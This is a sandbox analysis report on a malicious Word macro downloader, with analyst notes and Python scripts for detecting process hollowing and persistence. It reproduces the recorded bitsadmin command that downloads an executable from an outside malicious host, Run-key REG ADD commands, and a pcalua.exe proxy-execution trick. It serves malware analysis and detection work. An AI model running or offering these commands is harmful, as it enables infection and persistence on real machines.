Analysis

  Max time kernel:   151s
  Max time network:  44s
  Platform:          windows7_x64
  Resource:          win7
  Submitted:         01-07-2020 02:06

  Static task      static1
  Behavioral task  behavioral1  sample SecuriteInfo.com.W97M.Downloader.3758.22468.doc, resource win7
  Behavioral task  behavioral2  sample SecuriteInfo.com.W97M.Downloader.3758.22468.doc, resource win10v200430
General

  Target:  SecuriteInfo.com.W97M.Downloader.3758.22468.doc
  Size:    39KB
  MD5:     205b4d4b93e744d9ae520b62e98c7619
  SHA1:    688752c9a25d28e3533cc98b37d98bc688614207
  SHA256:  61c7eb8c33d7eb01285c503fa72d249f470fe3606ff10e459cfdc2f9e3d59b35
  SHA512:  40d3d3a4b4b8944ec6546888bd1599945c5b558c7edcc24cdd0dc30f9331b1396d68e34eb5a43f5c38e60b24ad97b67c065722c1b462d4971f5b1e7e7143038c
Malware Config
Signatures
Suspicious behavior: EnumeratesProcesses (7 IoCs)
  PID   Process        Events
  1792  filename.exe   4
  2036  systemapp.exe  3
Loads dropped DLL (2 IoCs)
  PID   Process
  1792  filename.exe
  2036  systemapp.exe
Suspicious use of SetThreadContext (1 IoC)
  PID   Process        Description                Target PID  Target process
  2036  systemapp.exe  set thread context of 620  620         InstallUtil.exe
Read this together with the WriteProcessMemory signature: PID 2036 wrote into PID 620 twelve times, while every other parent/child pair in this run shows only three or four writes, and PID 620 is a freshly started copy of the dropped InstallUtil.exe. A burst of cross-process writes followed by SetThreadContext on the new process is consistent with process hollowing, with InstallUtil.exe serving as the host for the real payload.
Download via BitsAdmin (1 TTP, 1 IoC)
Suspicious use of WriteProcessMemory (43 IoCs)
  Source PID  Source process  Target PID  Target process   Events
  1060        WINWORD.EXE     1432        bitsadmin.exe    3
  1060        WINWORD.EXE     1792        filename.exe     4
  1792        filename.exe    1652        WINWORD.EXE      4
  1792        filename.exe    1576        cmd.exe          4
  1576        cmd.exe         1860        reg.exe          4
  1792        filename.exe    2036        systemapp.exe    4
  2036        systemapp.exe   520         cmd.exe          4
  520         cmd.exe         576         reg.exe          4
  2036        systemapp.exe   620         InstallUtil.exe  12
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token             PID   Process
  SeDebugPrivilege  1792  filename.exe
  SeDebugPrivilege  2036  systemapp.exe
Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
  PID   Process        Parent PID  Parent process  Description
  1432  bitsadmin.exe  1060        WINWORD.EXE     Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
  1792  filename.exe   1060        WINWORD.EXE     Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
Executes dropped EXE (2 IoCs)
  PID   Process
  2036  systemapp.exe
  620   InstallUtil.exe
Drops file in System32 directory (5 IoCs)
  Description                   File                                   Process
  File created                  C:\Windows\SysWOW64\APPFORM FORM.docx  filename.exe
  File opened for modification  C:\Windows\system32\APPFORM FORM.docx  WINWORD.EXE
  File opened for modification  C:\Windows\SysWOW64\systemapp.exe      filename.exe
  File created                  C:\Windows\SysWOW64\systemapp.exe      filename.exe
  File opened for modification  C:\Windows\SysWOW64\APPFORM FORM.docx  systemapp.exe
The mix of system32 and SysWOW64 spellings is file-system redirection: the droppers are 32-bit processes on a 64-bit host, so their writes to C:\Windows\system32 land in C:\Windows\SysWOW64. The Run key set below names the system32 path, so when hunting for the dropped binary check both directories rather than only the one the command line mentions.
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID   Process
  1060  WINWORD.EXE
Suspicious use of SetWindowsHookEx (3 IoCs)
  PID   Process      Events
  1060  WINWORD.EXE  3
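The SetThreadContext and WriteProcessMemory signatures above only tell the hollowing story when they are read together. The script below is an added example and not code from the report or its vendor: it transcribes the two signature tables by hand (PIDs, image names and event counts are the report's) and applies my own heuristic, treating the largest write count seen on a pair that never had SetThreadContext as the baseline for an ordinary process start, so that a SetThreadContext target which received far more writes than that stands out.

```python
"""Correlate the report's WriteProcessMemory and SetThreadContext signatures into
process-hollowing candidates.

Added example; not code from the sandbox report or its vendor. WPM_ROWS and STC_ROWS
are transcribed by hand from the two signature tables; the baseline/threshold logic
is an assumption of this example, not something the report states."""
from collections import Counter

# (caller_pid, caller_image, target_pid, target_image, write_events)
# constructed from 'Suspicious use of WriteProcessMemory' (43 events in total)
WPM_ROWS = [
    (1060, "WINWORD.EXE", 1432, "bitsadmin.exe", 3),
    (1060, "WINWORD.EXE", 1792, "filename.exe", 4),
    (1792, "filename.exe", 1652, "WINWORD.EXE", 4),
    (1792, "filename.exe", 1576, "cmd.exe", 4),
    (1576, "cmd.exe", 1860, "reg.exe", 4),
    (1792, "filename.exe", 2036, "systemapp.exe", 4),
    (2036, "systemapp.exe", 520, "cmd.exe", 4),
    (520, "cmd.exe", 576, "reg.exe", 4),
    (2036, "systemapp.exe", 620, "InstallUtil.exe", 12),
]
# (caller_pid, caller_image, target_pid, target_image)
# constructed from 'Suspicious use of SetThreadContext'
STC_ROWS = [(2036, "systemapp.exe", 620, "InstallUtil.exe")]


def total_writes(wpm_rows):
    """Total WriteProcessMemory events; should match the signature's IoC count."""
    return sum(r[4] for r in wpm_rows)


def writes_by_pair(wpm_rows):
    """Map (caller_pid, target_pid) -> number of WriteProcessMemory events."""
    counts = Counter()
    for caller, _, target, _, n in wpm_rows:
        counts[(caller, target)] += n
    return counts


def baseline_writes(wpm_rows, stc_rows):
    """Largest write count for a pair that never had SetThreadContext.

    Those pairs are ordinary process starts, so this is the 'normal' level of
    parent-to-child writes in this particular trace."""
    stc_pairs = {(r[0], r[2]) for r in stc_rows}
    counts = [n for pair, n in writes_by_pair(wpm_rows).items() if pair not in stc_pairs]
    return max(counts) if counts else 0


def hollowing_candidates(wpm_rows, stc_rows):
    """A pair is a hollowing candidate when the caller set the target's thread
    context AND wrote into it more often than any ordinary parent/child pair did."""
    pairs = writes_by_pair(wpm_rows)
    baseline = baseline_writes(wpm_rows, stc_rows)
    names = {r[0]: r[1] for r in wpm_rows}
    names.update({r[2]: r[3] for r in wpm_rows})
    found = []
    for caller, caller_img, target, target_img in stc_rows:
        n = pairs.get((caller, target), 0)
        if n > baseline:
            found.append({"caller_pid": caller, "caller": names.get(caller, caller_img),
                          "target_pid": target, "target": names.get(target, target_img),
                          "writes": n, "baseline": baseline})
    return sorted(found, key=lambda d: -d["writes"])


if __name__ == "__main__":
    print("total WriteProcessMemory events:", total_writes(WPM_ROWS))
    for c in hollowing_candidates(WPM_ROWS, STC_ROWS):
        print(f"hollowing candidate: {c['caller']} ({c['caller_pid']}) -> "
              f"{c['target']} ({c['target_pid']}), {c['writes']} writes "
              f"vs baseline {c['baseline']}")
```

On this trace the baseline is four writes and the only candidate is systemapp.exe (2036) into InstallUtil.exe (620) with twelve writes. The baseline is deliberately taken from the same trace rather than hard-coded, because how many writes accompany a plain CreateProcess depends on the sandbox's instrumentation and the OS build.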
Processes

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  (PID 1060, depth 1)
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.W97M.Downloader.3758.22468.doc"
    - Suspicious use of WriteProcessMemory
    - Drops file in System32 directory
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx

    C:\Windows\system32\bitsadmin.exe  (PID 1432, depth 2)
        bitsadmin /transfer myFile /download /priority normal http://entrega-vertices.com/10G1B.exe C:\Users\Admin\AppData\Local\Temp\filename.exe
        - Download via BitsAdmin
        - Process spawned unexpected child process

    C:\Users\Admin\AppData\Local\Temp\filename.exe  (PID 1792, depth 2)
        C:\Users\Admin\AppData\Local\Temp\filename.exe
        - Suspicious behavior: EnumeratesProcesses
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Process spawned unexpected child process
        - Drops file in System32 directory

        C:\Program Files\Microsoft Office\Office14\WINWORD.EXE  (PID 1652, depth 3)
            "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\system32\APPFORM FORM.docx"

        C:\Windows\SysWOW64\cmd.exe  (PID 1576, depth 3)
            "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\reg.exe  (PID 1860, depth 4)
                REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"

        C:\Windows\SysWOW64\systemapp.exe  (PID 2036, depth 3)
            "C:\Windows\system32\systemapp.exe"
            - Suspicious behavior: EnumeratesProcesses
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
            - Suspicious use of AdjustPrivilegeToken
            - Executes dropped EXE
            - Drops file in System32 directory

            C:\Windows\SysWOW64\cmd.exe  (PID 520, depth 4)
                "cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"
                - Suspicious use of WriteProcessMemory

                C:\Windows\SysWOW64\reg.exe  (PID 576, depth 5)
                    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"

            C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe  (PID 620, depth 4)
                "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
                - Executes dropped EXE

PIDs are taken from the signature tables above; the command lines are reproduced exactly as the sandbox recorded them, including the odd quoting of the REG ADD data. The chain is: the macro in WINWORD.EXE uses bitsadmin.exe to fetch 10G1B.exe as filename.exe, filename.exe opens a decoy document in a second Word instance, copies itself to SysWOW64 as systemapp.exe and registers an HKCU Run value, and systemapp.exe repeats the Run-key write and starts InstallUtil.exe. The Run value does not point at systemapp.exe directly but at pcalua.exe -a systemapp.exe; pcalua.exe is the signed Program Compatibility Assistant launcher, so the autostart entry shows a trusted Microsoft image while the payload is passed as its argument.
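Each step of the tree above is a process-creation event with a parent, an image and a command line, which is exactly what endpoint telemetry gives a detection engineer to work with. The following is an added example, not code from the report or from any vendor: it reconstructs the tree's events by hand, names the fields after Sysmon Event ID 1 (ParentImage, Image, CommandLine, ProcessId; an assumption about the log source), and runs four rules over them: an Office host spawning a child outside a small allowlist (the allowlist is a placeholder to tune per estate), a bitsadmin /transfer download, a REG ADD to a Run/RunOnce key with the value name and data parsed out even when the name is unquoted, and pcalua.exe -a proxy execution, which the same parser also unwraps from the Run-key data.

```python
"""Process-creation detections for the chain in this report.

Added example; not the report's own code or any vendor's rule set. EVENTS is
constructed by hand from the report's process tree; field names follow Sysmon
Event ID 1 naming, which is an assumption about the log source. The allowlist
is a placeholder, not a recommendation."""
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children an Office host may legitimately start (assumed; tune per environment).
OFFICE_CHILD_ALLOWLIST = {"splwow64.exe", "dw20.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.I)

WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\filename.exe"
REG_CMD = (r"REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v system application"
           r' /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Windows\system32\systemapp.exe"')

# Constructed from the report's process tree (PIDs from its signature tables).
EVENTS = [
    {"ProcessId": 1432, "ParentProcessId": 1060, "ParentImage": WORD,
     "Image": r"C:\Windows\system32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer myFile /download /priority normal "
                    r"http://entrega-vertices.com/10G1B.exe C:\Users\Admin\AppData\Local\Temp\filename.exe"},
    {"ProcessId": 1792, "ParentProcessId": 1060, "ParentImage": WORD, "Image": DROPPER, "CommandLine": DROPPER},
    {"ProcessId": 1652, "ParentProcessId": 1792, "ParentImage": DROPPER, "Image": WORD,
     "CommandLine": '"' + WORD + r'" /n "C:\Windows\system32\APPFORM FORM.docx"'},
    {"ProcessId": 1576, "ParentProcessId": 1792, "ParentImage": DROPPER,
     "Image": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": '"cmd.exe" /c ' + REG_CMD},
    {"ProcessId": 1860, "ParentProcessId": 1576, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\reg.exe", "CommandLine": REG_CMD},
    {"ProcessId": 2036, "ParentProcessId": 1792, "ParentImage": DROPPER,
     "Image": r"C:\Windows\SysWOW64\systemapp.exe", "CommandLine": r'"C:\Windows\system32\systemapp.exe"'},
    {"ProcessId": 576, "ParentProcessId": 520, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\reg.exe", "CommandLine": REG_CMD},
    {"ProcessId": 620, "ParentProcessId": 2036, "ParentImage": r"C:\Windows\SysWOW64\systemapp.exe",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"'},
]


def _base(image):
    return PureWindowsPath(image).name.lower()


def parse_run_key_add(cmd):
    """Parse 'reg add <key> ... /v <name> /t <type> /d <data>' for a Run/RunOnce key.

    The value name may be unquoted and contain spaces (as in this report), so it is
    taken as everything between /v and the next /t, /d or /f switch. Returns None
    when the command is not an add to a Run/RunOnce key."""
    if not re.match(r'\s*"?reg(\.exe)?"?\s+add\s', cmd, re.I) or not RUN_KEY_RE.search(cmd):
        return None
    key = re.search(r"\badd\s+(\S+)", cmd, re.I).group(1)
    value = re.search(r"/v\s+(.+?)\s+/(?:t|d|f)\b", cmd, re.I)
    data = re.search(r"/d\s+(.+?)(?:\s+/f\b|\s*$)", cmd, re.I)
    data_str = data.group(1).strip() if data else None
    proxied = None
    if data_str:
        # pcalua.exe -a <target> runs <target> through the Program Compatibility
        # Assistant, so the Run value shows a signed Microsoft image while the
        # payload rides behind it; pull the real target out.
        m = re.search(r'pcalua\.exe"?\s+-a\s+"?([^"]+?)"?\s*$', data_str, re.I)
        proxied = m.group(1).strip() if m else None
    return {"key": key,
            "value": value.group(1).strip().strip('"') if value else None,
            "data": data_str,
            "proxied_target": proxied}


def detect(events):
    """Return (rule, pid, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        parent, child, cmd = _base(ev["ParentImage"]), _base(ev["Image"]), ev["CommandLine"]
        if parent in OFFICE_APPS and child not in OFFICE_CHILD_ALLOWLIST:
            alerts.append(("office_child", ev["ProcessId"], child))
        if child == "bitsadmin.exe" and re.search(r"/transfer\b", cmd, re.I):
            # URL and destination; handles unquoted paths, which is what BITSAdmin got here
            m = re.search(r"(https?://\S+)\s+(\S+)\s*$", cmd, re.I)
            alerts.append(("bitsadmin_download", ev["ProcessId"], m.groups() if m else None))
        if child == "reg.exe":
            persist = parse_run_key_add(cmd)
            if persist:
                alerts.append(("run_key_persistence", ev["ProcessId"], persist))
        if child == "pcalua.exe" and re.search(r"\s-a\s", cmd, re.I):
            alerts.append(("pcalua_proxy_exec", ev["ProcessId"], cmd))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:22} pid={pid:<5} {detail}")
```

Running it over the constructed events yields five alerts: two Office-child hits (bitsadmin.exe and filename.exe under PID 1060), the BITSAdmin download with its URL and destination, and two Run-key writes whose data unwraps to C:\Windows\system32\systemapp.exe behind pcalua.exe. The pcalua rule fires on the autostart itself at next logon rather than on anything in this trace; it is there because the Run value is the only place this report shows the proxy, and the launch is where a host without command-line logging of reg.exe would still see it.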
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

  C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
  C:\Users\Admin\Documents\APPFORM FORM.txt
  C:\Windows\SysWOW64\APPFORM FORM.docx
  C:\Windows\SysWOW64\systemapp.exe
  C:\Windows\SysWOW64\systemapp.exe
  \Users\Admin\AppData\Local\Temp\InstallUtil.exe
  \Windows\SysWOW64\systemapp.exe
  memory/520-24-0x0000000000000000-mapping.dmp
  memory/576-25-0x0000000000000000-mapping.dmp
  memory/620-29-0x000000000040CA6E-mapping.dmp
  memory/620-28-0x0000000000400000-0x0000000000412000-memory.dmp  (72KB)
  memory/1060-8-0x0000000008CE0000-0x0000000008CE4000-memory.dmp  (16KB)
  memory/1060-10-0x0000000008CE0000-0x0000000008CE4000-memory.dmp  (16KB)
  memory/1060-9-0x0000000008CE0000-0x0000000008CE4000-memory.dmp  (16KB)
  memory/1432-2-0x0000000000000000-mapping.dmp
  memory/1576-11-0x0000000000000000-mapping.dmp
  memory/1652-7-0x0000000000000000-mapping.dmp
  memory/1792-5-0x0000000000000000-0x0000000000000000-disk.dmp
  memory/1792-3-0x0000000000000000-mapping.dmp
  memory/1860-12-0x0000000000000000-mapping.dmp
  memory/2036-16-0x0000000000000000-mapping.dmp